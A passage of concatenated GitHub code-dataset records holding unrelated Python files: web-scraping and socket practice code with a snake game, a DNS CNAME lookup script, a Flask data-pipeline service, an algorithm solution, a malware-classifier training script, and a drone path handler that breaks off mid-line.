\r\n\r\n\r\nso=bs(htm,'html.parser')\r\n#print(so.prettify())\r\n#beautifulsoup1\r\n\r\nprint(so.title)\r\nprint(so.title.name)\r\nprint(so.title.string)\r\nprint(so.a.parent.name)\r\nprint(so.p['class'])\r\nprint(so.p.attrs)\r\nso.a.string.replace_with(\"233\")\r\nx=iter(so.find_all('a'))\r\nfor i in range(len(so.find_all('a'))):print(next(x))\r\nso.p['id']='ha'\r\nprint(so.p.attrs)\r\n\r\nprint(so.a.string)\r\nprint(so.name)\r\nprint('--------------------------------------------------')\r\nfor i in range(len(so.contents)):print(so.contents[i])\r\nprint(23)\r\nhe=so.body\r\nti=he.contents[0]\r\nprint(he)\r\nfor i in he.children:print(i)\r\nprint(\"-----------\")\r\ns=so.head\r\nfor i in he.descendants:print(i)\r\nprint(23)\r\nfor i in so.strings:print(repr(i))\r\nfor i in so.stripped_strings:print(repr(i))\r\n\r\n#beautiuflsoup2\r\n\r\nt=so.title\r\nprint(t.string.parent)\r\nprint(so.parent)\r\nfor i in so.a.parents:print(i.name)\r\nll=bs(\"text1text2\",'html.parser')\r\nprint(ll.prettify())\r\nprint(ll.b.next_sibling)\r\nprint(ll.c.previous_sibling)\r\nprint(\"-----------\")\r\nsl=so.find(\"a\",id='link3')\r\nprint(sl)\r\nprint(sl.next_sibling)\r\nprint(sl.next_element)\r\nprint(sl.previous_sibling)\r\nprint(sl.previous_element)\r\nprint(\"______________\")\r\nimport re\r\nprint(so.find_all(\"a\"))\r\nprint(23)\r\nprint(so.a.name)\r\nfor i in so.find_all(re.compile(\"t\")):print(i.name)\r\n#print(so.find_all(re.compile(\"^b\")))\r\nfor i in so.find_all([\"a\",\"b\"]):print(i.previous_element)\r\nprint(\"-------------------\")\r\nfor i in so.find_all(True):print(i.string)\r\nprint(so(\"a\"))\r\nprint(so.find(\"a\"))\r\n\r\nprint(so.select(\".sister\"))\r\n\r\n\"\"\"\r\n#urlib\r\n\"\"\"\r\nimport urllib.request\r\n#response=urllib.request.urlopen('https://www.python.org') #请求站点获得一个HTTPResponse对象\r\n#print(response.read().decode('utf-8')) #返回网页内容\r\n#print(response.getheader('server')) #返回响应头中的server值\r\n#print(response.getheaders()) #以列表元祖对的形式返回响应头信息\r\n#print(response.fileno()) #返回文件描述符\r\n#print(response.version) #返回版本信息\r\n#print(response.status) #返回状态码200,404代表网页未找到\r\n#print(response.debuglevel) #返回调试等级\r\n#print(response.closed) #返回对象是否关闭布尔值\r\n#print(response.geturl()) #返回检索的URL\r\n#print(response.info()) #返回网页的头信息\r\n#print(response.getcode()) #返回响应的HTTP状态码\r\n#print(response.msg) #访问成功则返回ok\r\n#print(response.reason) #返回状态信息\r\n\r\nfrom urllib.request import urlopen\r\nimport urllib.parse\r\n\r\ndata = bytes(urllib.parse.urlencode({'word':'hello'}),encoding='utf-8') \r\n#data需要字节类型的参数,使用bytes()函数转换为字节,使用urllib.parse模块里的urlencode()方法来讲参数字典转换为字符串并指定编码\r\nresponse = urlopen('http://httpbin.org/post',data=data)\r\nprint(response.read())\r\nprint(type(response))\r\n\"\"\"\r\n#requests\r\nimport requests\r\n'''\r\nurl = 'https://www.runoob.com/w3cnote/python-spider-intro.html'\r\nr = requests.get(url)\r\nprint(type(r)) # 类型是str(JSON格式)\r\nprint(r.status_code)\r\nprint(\"--------\")\r\nprint(r.text)\r\nprint(\"--------\")\r\nprint(r.cookies)\r\n'''\r\n\"\"\"\r\nr = requests.get(\"http://github.com/favicon.ico\")\r\nprint(r.text)\r\nprint(r.content)\r\n# 保存图片\r\nwith open('favicon.ico','wb') as f:\r\n f.write(r.content)\r\n\"\"\"\r\n\"\"\"\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\nimport json\r\nur2 = 'https://www.runoob.com/w3cnote/python-spider-intro.html'\r\n\r\n#print(r.json().load())\r\n#so=bs(r.text,'html.parser')\r\n\r\ndata = {\r\n 'name': 'germey',\r\n 'age': 22\r\n}\r\nurl = 'http://httpbin.org/get'\r\n#r = requests.get(ur2,params=data)\r\nr1 = requests.post(url, params=data)\r\nr2 = requests.get(url)\r\n\r\n#print(r1.json())\r\nprint(r1.text)\r\nprint(r2.status_code)\r\nprint(\"______________\")\r\nprint(r2.headers)\r\nprint(\"______________\")\r\nprint(r2.cookies)\r\nprint(\"______________\")\r\nprint(r2.history)\r\n#v=so.find_all(\"a\")\r\n#x=iter(v)\r\n#for i in so.find_all(\"a\"):\r\n #print(i.string)\r\n\"\"\"\r\n\"\"\"\r\n#贪吃蛇\r\nimport tkinter as tk\r\nimport random as rd\r\nimport time as tm\r\nimport tkinter.messagebox \r\n\r\nws=tk.Tk()\r\nws.geometry(\"500x500\")\r\nws.title(\"Snake\")\r\n\r\nfr=tk.Frame(ws,width=500,height=500)\r\nfr.pack()\r\n\r\ndef start():\r\n fr.pack_forget()\r\n mygame=gameview()\r\n\r\ntitle=tk.Label(fr,text=\"贪吃蛇\",font=('Arial', 44)).place(x=180,y=100)\r\n \r\nplay=tk.Button(fr,text=\"Play\",command=start)\r\nplay.place(x=250,y=250)\r\n\r\nclass gameview():\r\n def __init__(self):\r\n self.x=rd.randrange(0,191,10)\r\n self.y=rd.randrange(0,91,10)\r\n\r\n self.snakelist=[0]\r\n self.listx=[self.x]\r\n self.listy=[self.y]\r\n\r\n self.a=rd.randrange(0,91,10)\r\n self.b=rd.randrange(0,91,10)\r\n\r\n print(self.x,self.y,self.a,self.b)\r\n self.i=1\r\n self.j=0\r\n \r\n self.ifmove=False\r\n\r\n self.var1=\"233\"\r\n \r\n self.main=tk.Frame(ws)\r\n self.main.pack(fill=\"both\",expand=True)\r\n \r\n self.border=tk.Canvas(self.main,bg=\"#000\",width=500,height=400)\r\n \r\n self.snake=self.border.create_rectangle(self.x,self.y,self.x+10,self.y+10,fill=\"#0ff\")\r\n self.food=self.border.create_rectangle(self.a,self.b,self.a+10,self.b+10,fill=\"#f00\")\r\n \r\n self.border.pack()\r\n\r\n def end():\r\n self.main.pack_forget()\r\n fr.pack()\r\n\r\n self.over=tk.Button(self.main,text=\"end\",command=end)\r\n self.over.place(x=250,y=450)\r\n\r\n self.text1=tk.StringVar()\r\n self.text1.set(\"Play\")\r\n\r\n self.text2=tk.StringVar()\r\n self.text2.set(\"0\")\r\n\r\n self.score=tk.Label(self.main,text=\"Score:\").place(x=100,y=450)\r\n self.myscore=tk.Label(self.main,textvariable=self.text2).place(x=140,y=450)\r\n \r\n def timeflood():\r\n while(self.ifmove): \r\n self.border.move(self.snake,10*self.i,10*self.j)\r\n self.listx[0]+=10*self.i\r\n self.listy[0]+=10*self.j\r\n print(\"当前头部位置:\",self.listx[0],self.listy[0])\r\n\r\n if(len(self.listx)>2):\r\n for k in range(len(self.listx)-1):\r\n self.listx[k+1]+=10*self.i\r\n self.listy[k+1]+=10*self.j \r\n prex=tuple(self.listx)\r\n prey=tuple(self.listy) \r\n \r\n for k in range(len(self.snakelist)-1):\r\n #self.border.move(self.snakelist[k+1],10*self.prei,10*self.prej)\r\n self.border.coords(self.snakelist[k+1],prex[k]-10*self.i,prey[k]-10*self.j,prex[k]+10*(1-self.i),prey[k]+10*(1-self.j))\r\n self.listx[k+1]=prex[k]-10*self.i\r\n self.listy[k+1]=prey[k]-10*self.j\r\n\r\n print(\"当前身子%d位置:\"%(k+1),self.listx[k+1],self.listy[k+1])\r\n \r\n eat()\r\n\r\n tm.sleep(0.4)\r\n ws.update()\r\n\r\n boun()\r\n boom()\r\n \r\n def ifplay():\r\n self.ifmove=not self.ifmove\r\n if self.ifmove:self.text1.set(\"Pause\")\r\n else:self.text1.set(\"Continue\")\r\n print(self.text1)\r\n \r\n if self.var1==\"replay\":\r\n self.var1='233'\r\n\r\n self.border.delete(\"all\")\r\n \r\n self.x=rd.randrange(0,191,10)\r\n self.y=rd.randrange(0,91,10)\r\n\r\n self.a=rd.randrange(0,191,10)\r\n self.b=rd.randrange(0,91,10)\r\n\r\n self.snake=self.border.create_rectangle(self.x,self.y,self.x+10,self.y+10,fill=\"#0ff\")\r\n self.food=self.border.create_rectangle(self.a,self.b,self.a+10,self.b+10,fill=\"#f00\")\r\n\r\n self.snakelist=[0]\r\n self.listx=[self.x]\r\n self.listy=[self.y]\r\n \r\n self.text2.set('0')\r\n self.text1.set(\"Continue\")\r\n self.ifmove=False\r\n \r\n timeflood() \r\n \r\n self.start=tk.Button(self.main,textvariable=self.text1,command=ifplay)\r\n self.start.place(x=350,y=450)\r\n\r\n def up(event):\r\n if self.ifmove==True: \r\n self.i=0\r\n self.j=-1\r\n \r\n def down(event):\r\n if self.ifmove==True:\r\n self.i=0\r\n self.j=1\r\n \r\n def left(event):\r\n if self.ifmove==True: \r\n self.i=-1\r\n self.j=0\r\n \r\n def right(event):\r\n if self.ifmove==True:\r\n self.i=1\r\n self.j=0\r\n \r\n ws.bind(\"\",up)\r\n ws.bind(\"\",down)\r\n ws.bind(\"\",right)\r\n ws.bind(\"\",left)\r\n\r\n def fooding():\r\n self.a=rd.randrange(0,191,10)\r\n self.b=rd.randrange(0,91,10)\r\n return (self.a,self.b,self.a+10,self.b+10)\r\n def eat():\r\n if self.listx[0]==self.a and self.listy[0]==self.b:\r\n print(23)\r\n self.border.coords(self.food,fooding())\r\n print(2,self.a,self.b)\r\n lenth()\r\n def lenth():\r\n k=len(self.snakelist)-1\r\n print(\"当前身子长度%d\"%(k+2))\r\n self.snakelist.append(self.border.create_rectangle(self.listx[k]-10*self.i,self.listy[k]-10*self.j,self.listx[k]+10*(1-self.i),self.listy[k]+10*(1-self.j),fill=\"#f0f\"))\r\n\r\n self.text2.set(str(len(self.snakelist)-1))\r\n \r\n self.listx.append(self.listx[k]-10*self.i)\r\n self.listy.append(self.listy[k]-10*self.j)\r\n print(\"身体生成于:\",self.listx[k]-10*self.i,self.listy[k]-10*self.j)\r\n\r\n def boun():\r\n if (self.listx[0]<0 or self.listx[0]>=500 or self.listy[0]<0 or self.listy[0]>=400):\r\n tk.messagebox.showwarning(title='失败', message='游戏结束')\r\n self.var1=\"replay\"\r\n self.ifmove=False\r\n self.text1.set(self.var1)\r\n\r\n def boom():\r\n for k in range(len(self.snakelist)-1):\r\n if (self.listx[0]==self.listx[k+1] and self.listy==self.listy[k+1]):\r\n print(23)\r\n tk.messagebox.showwarning(title='失败', message='游戏结束')\r\n self.var1=\"replay\"\r\n self.ifmove=False\r\n self.text1.set(self.var1)\r\n\"\"\"\r\n#socket\r\n\r\nimport socket \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nhost=socket.gethostname()\r\nprint(host)\r\ns.bind(('127.0.0.1',9092))#127那个是回路ip 自己访问自己\r\ns.listen(5)\r\nprint(\"23333\")\r\n\r\nwhile True:\r\n sock,addr=s.accept() #sock 是真正的管道\r\n print(\"连接地址: %s\" % str(addr))\r\n data=sock.recv(1024)\r\n print(data)\r\n sock.send(\"hahahhaah\")\r\n #sock.close()\r\n","repo_name":"Rubus-LF/teachsay","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":41360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25454492074","text":"#!/bin/python3\n\nimport sys\nimport dns.resolver as dnsr\n\n#Example: python3 dnsSubdomainScanner.py \"mail.google.com\"\n\ndef show_subdomains(target):\n\tcname_list = dnsr.resolve(target, 'CNAME')\n\tif len(cname_list) > 0:\n\t\ti = 1\n\t\tfor item in cname_list:\n\t\t\tprint(\"Subdomains:\")\n\t\t\tprint(f\"{i}) {item.target}\")\n\t\t\ti += 1\n\telse:\n\t\tprint(\"Not found any subdomains\")\n\ndef main():\n\ttry:\n\t\tif len(sys.argv) == 2:\n\t\t\ttarget = str(sys.argv[1])\n\t\t\tshow_subdomains(target)\n\t\telse:\n\t\t\tprint(\"Wrong number of arguments\")\n\t\t\tprint(\"Template: python3 dnsSubdomainScanner.py \")\n\texcept Exception as e:\n\t\tprint(f\"Error: {e}\")\n\t\t\nmain()\n\n","repo_name":"dadallles/Basic-Tools","sub_path":"dnsSubdomainScanner/dnsSubdomainScanner.py","file_name":"dnsSubdomainScanner.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34750615445","text":"from flask import Flask, request, jsonify, Response\nimport json\nimport requests\nimport logging\nimport os\nimport sys\nfrom datahubs.sesam import create_pipe, create_system, get_all_input_pipes, create_global, create_pipe_with_fkey_ni, create_pipe_with_idx_ni, get_all_pipes, get_global_pipe_config\nfrom processing.mysql import connect_to_db as mysql_db\nfrom processing.oracle import connect_to_db as oracle_db\nfrom processing.postgres import connect_to_db as postgres_db\nfrom processing.mssql import connect_to_db as mssql_db\nfrom flask_cors import CORS, cross_origin\nfrom sesamutils import VariablesConfig, sesam_logger\nimport urllib3\n\nurllib3.disable_warnings()\napp = Flask(__name__)\n\n## Helpers\nlogger = sesam_logger(\"Steve the logger\", app=app)\nCORS(app,\n resources={r\"/*\": {\n \"origins\": \"*\"\n }},\n headers={\n 'Access-Control-Request-Headers', 'Content-Type',\n 'Access-Control-Allow-Origin'\n })\n\nconnecting_params = None\nsesam_response = None\ndatahub_config_and_tables = None\nfkey_relations = None\nindex_relations = None\n\n## Logic for running program in dev\ntry:\n with open(\"./backend/helpers.json\", \"r\") as stream:\n logger.info(\"Using env vars defined in helpers.json\")\n env_vars = json.load(stream)\n os.environ['sesam_jwt'] = env_vars['sesam_jwt']\n os.environ['sesam_base_url'] = env_vars['sesam_base_url']\nexcept OSError as e:\n logger.info(\"Using env vars defined in SESAM\")\n##\n \nrequired_env_vars = ['sesam_jwt', 'sesam_base_url']\noptional_env_vars = [\"Denmark_is_here\"]\nsesam_jwt = os.getenv('sesam_jwt')\nbase_url = os.getenv('sesam_base_url')\n\n@app.route('/')\ndef index():\n output = {\n 'service': 'Autoconnect up and running',\n 'remote_addr': request.remote_addr\n }\n\n return jsonify(output)\n\n\n## Get connection parameters for db connection and saving them to global variable \"connecting_params\"\n@app.route('/connectors', methods=['POST'])\n@cross_origin()\ndef get_connectors():\n global connecting_params\n connectors = request.json\n connecting_params = connectors\n return jsonify({\"parameters\": \"committed\"})\n\n\n## Create dataflow excluding globals and check for fkey_relations or index_relations.\n@app.route('/create_dataflow', methods=['POST'])\n@cross_origin()\ndef create_dataflow():\n ## Validating env vars\n config = VariablesConfig(required_env_vars, optional_env_vars)\n if not config.validate():\n sys.exit(1)\n\n # Variables\n sesam_system_response = None\n sesam_pipe_response = None\n global datahub_config_and_tables\n global sesam_response\n global fkey_relations\n global index_relations\n connectors = request.json\n pipes = connectors['tables']\n\n #creating system\n sesam_system_response = create_system(connecting_params, sesam_jwt, base_url)\n if sesam_system_response != \"Your system has been created\":\n sesam_system_response = \"Your system could not be created. Make sure your provided SESAM variables are correct\"\n\n #creating pipes with or without relations\n pipes_to_create = []\n for pipe in pipes:\n pipes_to_create.append(pipe['name'])\n\n remaining_table_relations = []\n if fkey_relations != []:\n for table in pipes_to_create:\n for fkey_table in fkey_relations:\n if table == fkey_table[0]:\n remaining_table_relations.append(fkey_table)\n\n for ni_relation in remaining_table_relations:\n if ni_relation[0] in pipes_to_create:\n pipes_to_create.remove(ni_relation[0])\n\n create_pipe_with_fkey_ni(connecting_params, remaining_table_relations, sesam_jwt, base_url)\n # remaining tables without ni's\n sesam_pipe_response = create_pipe(\n connecting_params, pipes_to_create,\n sesam_jwt,\n base_url)\n if sesam_pipe_response != \"Pipes created\":\n sesam_pipe_response = \"Your pipes could not be created. Make sure your provided SESAM variables are correct\"\n\n if index_relations != []:\n for table in pipes_to_create:\n for fkey_table in index_relations:\n if table == list(fkey_table[0].keys())[0] and list(fkey_table[0].keys())[0] not in remaining_table_relations:\n remaining_table_relations.append(fkey_table)\n\n for ni_relation in remaining_table_relations:\n if list(ni_relation[0].keys())[0] in pipes_to_create:\n pipes_to_create.remove(list(ni_relation[0].keys())[0])\n\n create_pipe_with_idx_ni(connecting_params, remaining_table_relations, sesam_jwt, base_url)\n # remaining tables without ni's\n sesam_pipe_response = create_pipe(\n connecting_params, pipes_to_create,\n sesam_jwt,\n base_url)\n if sesam_pipe_response != \"Pipes created\":\n sesam_pipe_response = \"Your pipes could not be created. Make sure your provided SESAM variables are correct\"\n\n if index_relations == [] and fkey_relations == []:\n sesam_pipe_response = create_pipe(\n connecting_params, pipes_to_create,\n sesam_jwt,\n base_url)\n if sesam_pipe_response != \"Pipes created\":\n sesam_pipe_response = \"Your pipes could not be created. Make sure your provided SESAM variables are correct\"\n\n sesam_response = {\n \"sesam_result\": \"Your system and pipes have been created! ;)\"\n }\n return {\n \"system_result\": sesam_system_response,\n \"pipe_result\": sesam_pipe_response\n }\n\n\n## Get initial scan of db, get relations and write to globals [fkey_relations, index_relations]\n@app.route('/scan_db', methods=['GET', 'POST'])\n@cross_origin()\ndef get_db_data():\n global connecting_params\n global fkey_relations\n global index_relations\n fkey_query_relations = None\n index_query_relations = None\n table_result = None\n tables = []\n pkeys = []\n option = connecting_params['option']\n connecting_params[\"dbase\"] = connecting_params[\"dbase\"].lower()\n\n try:\n if option[0] == \"Foreign Key references\" or option == \"Foreign Key references\":\n option = \"Fkey\"\n if option[0] == \"Index references\" or option == \"Index references\":\n option = \"Index\"\n except:\n tables = \"Not working\"\n \n if connecting_params[\"dbase\"] == \"mysql\":\n table_result, fkey_query_relations, index_query_relations = mysql_db(\n connecting_params, option)\n if connecting_params[\"dbase\"] == \"postgresql\":\n table_result, fkey_query_relations, index_query_relations = postgres_db(\n connecting_params, option)\n if connecting_params[\"dbase\"] == \"oracle\":\n table_result, fkey_query_relations, index_query_relations = oracle_db(\n connecting_params, option)\n if connecting_params[\"dbase\"] == \"mssql\":\n table_result, fkey_query_relations, index_query_relations = mssql_db(\n connecting_params, option)\n\n fkey_relations = fkey_query_relations\n index_relations = index_query_relations\n\n if table_result == None:\n tables = \"Not working\"\n\n if tables != \"Not working\" and len(table_result) != 0:\n index_value = 1\n for table, pkey in table_result:\n tables.append({\"id\": index_value, \"name\": table, \"groupId\": 1})\n pkeys.append(pkey)\n index_value = index_value + 1\n\n return {\"result\": tables}\n\n\n## General response...\n@app.route('/sesam_response', methods=['GET'])\ndef sesam_result():\n global sesam_response\n return sesam_response\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True, threaded=True)","repo_name":"JonasAls89/autoconnect","sub_path":"app/backend/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":7649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74342595022","text":"'''\n0. 완전탐색을 할 줄 안다. 완전탐색을 응용해서 문제를 해결할 수 있다.\n1. 전체 날짜 수가 100000까지 있으므로 아이디어 싸움이다.\n2. 첫번째 경우만 sum 해준다.\n3. 그 다음부터 젤 앞요소를 빼주고 K번째를 더해준다.\n'''\n\nN, K = map(int, input().split()) # 전체 날짜 수, 연속적인 날짜 수\ntem_lst = list(map(int, input().split()))\nsum_lst = []\ntemp = sum(tem_lst[:K])\nsum_lst.append(temp)\nfor x in range(N-K):\n temp -= (tem_lst[x] - tem_lst[x+K])\n sum_lst.append(temp)\nans = max(sum_lst)\nprint(ans)","repo_name":"hyoonpark/Algorithm","sub_path":"BOJ/BOJ_2559_수열.py","file_name":"BOJ_2559_수열.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21356080627","text":"from cnn import CNN_MAL\nfrom rnn import RNN_MAL\nfrom gnn import GNN_MAL\nimport config\nimport pickle\nimport glob\nimport numpy as np\nimport tensorflow as tf\nfrom text_iterator import text_iterator\nfrom graph_iterator import *\nfrom tf_utils import check_distribution\n#print(tf.executing_eagerly())\n\ndef prepare_data_image(tensor = True):\n with open(config.CFG_split_data, 'rb') as jf:\n train_set, test_set, train_lbs, test_lbs = pickle.load(jf)\n b = glob.glob('data/L/Benign/*')\n v = glob.glob('data/L/Virus/*')\n alls = b + v\n check_distribution(train_set, alls)\n check_distribution(test_set, alls)\n train_set = [alls[f] for f in train_set]\n test_set = [alls[f] for f in test_set]#[:50]\n check_distribution(train_set)\n check_distribution(test_set)\n def _parsefunc(filename, lbs):\n img_st = tf.io.read_file(filename)\n img_dec = tf.io.decode_png(img_st, channels=config.channel)\n img = tf.cast(img_dec,tf.float32)/255.\n img = tf.image.resize(img, [config.img_height, config.img_height],method='bilinear')\n return img, lbs\n def convert_dataset(train_set, train_lbs, _parsefunc, batch_size=config.batch_size):\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n ds = tf.data.Dataset.from_tensor_slices((train_set, train_lbs))\n train_ds = ds.map(_parsefunc)\n train_ds = train_ds.batch(batch_size)\n train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\n return train_ds\n return convert_dataset(train_set, train_lbs, _parsefunc), convert_dataset(test_set, test_lbs, _parsefunc, 1)\n \n\ndef prepare_data_txt():\n with open(config.CFG_split_data, 'rb') as jf:\n train_set, test_set, _, _ = pickle.load(jf)\n b = glob.glob('data/Seq-ori/Benign/*')\n v = glob.glob('data/Seq-ori/Virus/*')\n alls = b + v\n check_distribution(train_set, alls)\n check_distribution(test_set, alls)\n train_set = [alls[f] for f in train_set]\n test_set = [alls[f] for f in test_set]#[:50]\n check_distribution(train_set)\n check_distribution(test_set)\n print(len(train_set), len(test_set))\n train_ds = text_iterator(train_set, 1, config.batch_size)\n test_ds = text_iterator(test_set, 1, config.batch_size, shuffle=False)\n return train_ds, test_ds\n\ndef prepare_data_graph():\n with open(config.graph_data, 'rb') as jf:\n g_list = pickle.load(jf)\n with open(config.CFG_split_data, 'rb') as jf:\n train_set, test_set, _, _ = pickle.load(jf)\n print(len(train_set), len(test_set))\n return [g_list[i] for i in train_set], [g_list[i] for i in test_set] \n\ndef cnn_model(load=\"\"):\n model = CNN_MAL(config.num_classes)\n model.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n if load!=\"\":\n _, ckpt_manager = load_ckpt(model, config.model_save_path+load+'/')\n return model\n\ndef rnn_model(name,load=\"\"):\n model = RNN_MAL(config.num_classes, name)\n model.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['acc']) \n if load!=\"\":\n _, ckpt_manager = load_ckpt(model, config.model_save_path+load+'/')\n return model\n\n\ndef gnn_model(load=\"\"):\n model = GNN_MAL(config.num_classes)\n if load!=\"\":\n _, ckpt_manager = load_ckpt(model, config.model_save_path+load+'/')\n return model\n\nfn = tf.keras.metrics.FalseNegatives()\nfp = tf.keras.metrics.FalsePositives()\ntn = tf.keras.metrics.TrueNegatives()\ntp = tf.keras.metrics.TruePositives()\nacc = tf.keras.metrics.Accuracy() \nrecall = tf.keras.metrics.Recall()\ndef metrics(y_true, y_pred):\n print(fn(y_true, y_pred),fp(y_true, y_pred),tn(y_true, y_pred),tp(y_true, y_pred) ,recall(y_true, y_pred), acc(y_true, y_pred))\n fp.reset_states()\n fn.reset_states()\n tp.reset_states()\n tn.reset_states()\n acc.reset_states()\n recall.reset_states()\n\ndef train(name):\n if name == 'cnn':\n train_ds, val_ds = prepare_data_image()\n model = cnn_model()\n elif name == 'lstm' or name == 'gru' or name == 'rnn':\n train_ds, val_ds = prepare_data_txt()\n model = rnn_model(name)\n elif name == 'gnn':\n train_ds, val_ds = prepare_data_graph()\n model = gnn_model()\n \n _, ckpt_manager = load_ckpt(model, config.model_save_path+name+'/')\n _max_acc = 0.90\n if name == 'gnn':\n for _ in range(config.epochs):\n gnn_train(model, train_ds)\n y_true, y_pred = gnn_test(model, val_ds)\n metrics(y_true, y_pred)\n ckpt_manager.save()\n else:\n for i in range(config.epochs):\n print('===========\\n',i)\n history = model.fit(\n train_ds,\n validation_data=val_ds,\n batch_size=config.batch_size,\n #steps_per_epoch=config.train_size/config.batch_size,\n epochs=5#config.epochs\n ) \n if history.history['val_accuracy'][0] > _max_acc:\n _max_acc = history.history['val_accuracy'][0] \n ckpt_manager.save() \n\ndef evaluation(name):\n if name == 'cnn':\n _, val_ds = prepare_data_image()\n model = cnn_model(name)\n elif name == 'lstm' or name == 'gru' or name == 'rnn':\n _, val_ds = prepare_data_txt()\n model = rnn_model(name,name)\n elif name == 'gnn':\n _, val_ds = prepare_data_graph()\n model = gnn_model(name)\n\n \n if name == 'gnn':\n y_true, y_pred = gnn_test(model, val_ds)\n metrics(y_true, y_pred)\n elif name == 'lstm' or name == 'gru' or name == 'rnn':\n y_pred = model.predict(val_ds)\n y_pred = tf.reshape(tf.argmax(y_pred, axis=1), shape=(-1))\n y_true = val_ds.get_labels()\n y_true=tf.concat(y_true, 0)\n metrics(y_true, y_pred)\n else:\n y_pred = model.predict(val_ds)\n model.save(config.model_save_path+name+\"/single.model\")\n y_pred = tf.reshape(tf.argmax(y_pred, axis=1), shape=(-1))\n y_true = []\n for element in val_ds.as_numpy_iterator(): \n y_true.append(element[1]) \n y_true=tf.concat(y_true, 0)\n metrics(y_true, y_pred)\n\ndef load_ckpt(model, path, newest=True):\n ckpt = tf.train.Checkpoint(transformer=model)\n ckpt_manager = tf.train.CheckpointManager(ckpt, path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n if newest == True:\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print ('Latest checkpoint restored!!', path, newest, ckpt_manager.latest_checkpoint)\n else:\n ckpt.restore(path+newest)\n print ('checkpoint restored!!', path, newest)\n return ckpt, ckpt_manager\n\nif __name__ == '__main__':\n train('cnn')\n train('rnn')\n train('gnn')\n evaluation('cnn')\n","repo_name":"PSUCyberSecurityLab/AIforCybersecurity","sub_path":"Chapter6-Malware-Classification/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"47"} +{"seq_id":"5939297817","text":"#\n# Code common across shots to handle movement on paths\n#\nfrom pymavlink import mavutil\nimport location_helpers\nimport shotLogger\nfrom pathHandler import PathHandler\nfrom shotManagerConstants import *\nimport math\nfrom vector3 import Vector3\n\nlogger = shotLogger.logger\n\n#Path accel/decel constants\nWPNAV_ACCEL = 200\nWPNAV_ACCEL_Z = 160\n\n# for 3D max speed\nHIGH_PATH_SPEED = 5.0\nLOW_PATH_SPEED = 1.5\nMAX_PATH_SPEED = HIGH_PATH_SPEED + LOW_PATH_SPEED \n\n# used to correct for drag or other factors\nERROR_P = .01\n\n# special case of PathHandler\nclass VectorPathHandler(PathHandler):\n def __init__(self, vehicle, shotManager, heading, pitch):\n PathHandler.__init__(self, vehicle, shotManager)\n\n # the initial reference position\n self.initialLocation = vehicle.location.global_relative_frame\n self.heading = heading\n\n # creates a unit vector from telemetry data\n self.unitVector = self.getUnitVectorFromHeadingAndTilt(heading, pitch)\n \n # limit speed based on vertical component\n # We can't go full speed vertically\n # this section should be 2.0 to 8.0 m/s\n # to generate a nice speed limiting curve we scale it.\n # pitch is used to generate the vertical portion of the 3d Vector\n\n pitch = min(pitch, 0) # level\n pitch = max(pitch, -90) # down\n accelXY = shotManager.getParam( \"WPNAV_ACCEL\", WPNAV_ACCEL ) / 100.0\n accelZ = shotManager.getParam( \"WPNAV_ACCEL_Z\", WPNAV_ACCEL_Z ) / 100.0\n\n cos_pitch = math.cos(math.radians(pitch))\n \n self.maxSpeed = LOW_PATH_SPEED + (cos_pitch**3 * HIGH_PATH_SPEED)\n self.maxSpeed = min(self.maxSpeed, MAX_PATH_SPEED)\n self.accel = accelZ + (cos_pitch**3 * (accelXY - accelZ)) \n self.accel *= UPDATE_TIME\n\n # the current distance from the intitial location\n self.distance = 0.0\n\n #for synthetic acceleration\n self.currentSpeed = 0.0\n self.desiredSpeed = 0.0\n self.distError = 0.0\n\n # given RC input, calculate a speed to move along vector\n def move(self, channels):\n\n # allows travel along the vector\n # use the max of them\n if abs(channels[ROLL]) > abs(channels[PITCH]):\n userInput = channels[ROLL]\n else:\n userInput = -channels[PITCH]\n\n # user controls speed\n if self.cruiseSpeed == 0.0:\n self.desiredSpeed = userInput * self.maxSpeed\n\n # cruise control\n else:\n speed = abs(self.cruiseSpeed)\n # if sign of stick and cruiseSpeed don't match then...\n if math.copysign(1, userInput) != math.copysign(1, self.cruiseSpeed): # slow down\n speed *= (1.0 - abs(userInput))\n else: # speed up\n speed += (self.maxSpeed - speed) * abs(userInput)\n\n # carryover user input sign\n if self.cruiseSpeed < 0:\n speed = -speed\n\n # limit speed\n if speed > self.maxSpeed:\n speed = self.maxSpeed\n elif -speed > self.maxSpeed:\n speed = -self.maxSpeed\n\n self.desiredSpeed = speed\n \n # Synthetic acceleration\n if self.desiredSpeed > self.currentSpeed:\n self.currentSpeed += self.accel\n self.currentSpeed = min(self.currentSpeed, self.desiredSpeed)\n elif self.desiredSpeed < self.currentSpeed:\n self.currentSpeed -= self.accel\n self.currentSpeed = max(self.currentSpeed, self.desiredSpeed)\n else:\n self.currentSpeed = self.desiredSpeed\n\n\n # the distance to fly along the vectorPath\n self.distance += self.currentSpeed * UPDATE_TIME\n self.distance += self.distError * ERROR_P\n\n # generate Guided mode commands to move the copter\n self.travel()\n\n # report speed output\n return abs(self.currentSpeed)\n\n\n def travel(self):\n ''' generate a new location from our distance offset and initial position '''\n \n # the location of the vehicle in meters from the origin\n offsetVector = self.unitVector * self.distance\n\n # Scale unit vector by speed\n velVector = self.unitVector * self.currentSpeed\n\n # Convert NEU to NED velocity\n #velVector.z = -velVector.z\n\n # generate a new Location from our offset vector and initial location\n loc = 